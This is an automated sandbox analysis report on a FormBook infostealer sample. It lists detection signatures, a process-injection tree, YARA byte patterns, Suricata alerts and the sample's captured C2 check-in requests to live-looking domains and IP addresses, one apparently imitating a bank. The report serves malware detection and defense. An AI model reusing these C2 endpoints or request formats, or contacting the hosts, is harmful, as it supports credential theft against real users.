Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
p4LNUqyKZM.exe

Overview

General Information

Sample name:p4LNUqyKZM.exe
renamed because original name is a hash value
Original sample name:416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07.exe
Analysis ID:1503359
MD5:4214be98801c44f69b60490a3321e940
SHA1:df33635a4f458821d10ce62860a043a960ced09f
SHA256:416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • p4LNUqyKZM.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\p4LNUqyKZM.exe" MD5: 4214BE98801C44F69B60490A3321E940)
    • svchost.exe (PID: 2656 cmdline: "C:\Users\user\Desktop\p4LNUqyKZM.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • SCsLZYqthBle.exe (PID: 2412 cmdline: "C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 3444 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • SCsLZYqthBle.exe (PID: 1852 cmdline: "C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4544 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e8e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16942:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f6e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\p4LNUqyKZM.exe", CommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", ParentImage: C:\Users\user\Desktop\p4LNUqyKZM.exe, ParentProcessId: 5480, ParentProcessName: p4LNUqyKZM.exe, ProcessCommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", ProcessId: 2656, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\p4LNUqyKZM.exe", CommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", ParentImage: C:\Users\user\Desktop\p4LNUqyKZM.exe, ParentProcessId: 5480, ParentProcessName: p4LNUqyKZM.exe, ProcessCommandLine: "C:\Users\user\Desktop\p4LNUqyKZM.exe", ProcessId: 2656, ProcessName: svchost.exe

            Suricata Signatures

            Timestamp:2024-09-03T12:47:03.449238+0200
            SID:2855464
            Severity:1
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:48:22.027549+0200
            SID:2855464
            Severity:1
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:47:05.845810+0200
            SID:2855464
            Severity:1
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:47:16.668340+0200
            SID:2855464
            Severity:1
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:46:24.686828+0200
            SID:2855464
            Severity:1
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:48:08.668881+0200
            SID:2855464
            Severity:1
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:46:22.131705+0200
            SID:2855464
            Severity:1
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:48:11.402820+0200
            SID:2855464
            Severity:1
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:48:25.385798+0200
            SID:2855464
            Severity:1
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:46:36.128432+0200
            SID:2855464
            Severity:1
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:46:19.589102+0200
            SID:2855464
            Severity:1
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:48:33.766377+0200
            SID:2855464
            Severity:1
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:47:14.122963+0200
            SID:2855464
            Severity:1
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:48:19.457377+0200
            SID:2855464
            Severity:1
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:47:39.022061+0200
            SID:2855464
            Severity:1
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:47:41.568823+0200
            SID:2855464
            Severity:1
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:48:06.104368+0200
            SID:2855464
            Severity:1
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:47:36.459420+0200
            SID:2855464
            Severity:1
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:47:00.593340+0200
            SID:2855464
            Severity:1
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:46:33.583797+0200
            SID:2855464
            Severity:1
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:48:36.350756+0200
            SID:2855464
            Severity:1
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:47:19.220268+0200
            SID:2855464
            Severity:1
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T12:46:38.881573+0200
            SID:2855464
            Severity:1
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: p4LNUqyKZM.exeReversingLabs: Detection: 42%
            Source: p4LNUqyKZM.exeVirustotal: Detection: 37%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: p4LNUqyKZM.exeJoe Sandbox ML: detected
            Source: p4LNUqyKZM.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000001.00000002.1885469349.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852804747.000000000341A000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000002.3535610034.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SCsLZYqthBle.exe, 00000002.00000002.3535229764.00000000001BE000.00000002.00000001.01000000.00000004.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955287762.00000000001BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, p4LNUqyKZM.exe, 00000000.00000003.1694275848.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797175135.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1795600663.0000000003700000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.000000000461E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.0000000004480000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1885366615.000000000412D000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1891266886.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, p4LNUqyKZM.exe, 00000000.00000003.1694275848.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1885612260.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797175135.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1795600663.0000000003700000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000003.00000002.3536314646.000000000461E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.0000000004480000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1885366615.000000000412D000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1891266886.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000001.00000002.1885469349.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852804747.000000000341A000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000002.3535610034.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000003.00000002.3536613638.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955867133.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.00000000365AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000003.00000002.3536613638.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955867133.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.00000000365AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_009EDBBE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F68EE FindFirstFileW,FindClose,0_2_009F68EE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_009F698F
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009ED076
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009ED3A9
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009F9642
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009F979D
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_009F9B2B
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_009F5C97
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004DC750 FindFirstFileW,FindNextFileW,FindClose,3_2_004DC750
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004DC886 FindFirstFileW,FindNextFileW,FindClose,3_2_004DC886
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then xor eax, eax3_2_004C9B00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then mov ebx, 00000004h3_2_042D04DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 218.247.68.184:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 218.247.68.184:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 3.33.130.190:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.asian-massage-us.xyz
            Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
            Source: Joe Sandbox ViewIP Address: 154.23.184.240 154.23.184.240
            Source: Joe Sandbox ViewASN Name: HOSTIRAN-NETWORKIR HOSTIRAN-NETWORKIR
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: WEST263GO-HKWest263InternationalLimitedHK WEST263GO-HKWest263InternationalLimitedHK
            Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_009FCE44
            Source: global trafficHTTP traffic detected: GET /xsf1/?3L7=cfJLLBshpRPDzp&TJY8=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.clientebradesco.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /12ts/?TJY8=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&3L7=cfJLLBshpRPDzp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.myim.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ftud/?3L7=cfJLLBshpRPDzp&TJY8=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.d55dg.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /mkan/?TJY8=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&3L7=cfJLLBshpRPDzp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.fineg.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kc69/?TJY8=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&3L7=cfJLLBshpRPDzp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.asian-massage-us.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ifo8/?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&3L7=cfJLLBshpRPDzp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.aflaksokna.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
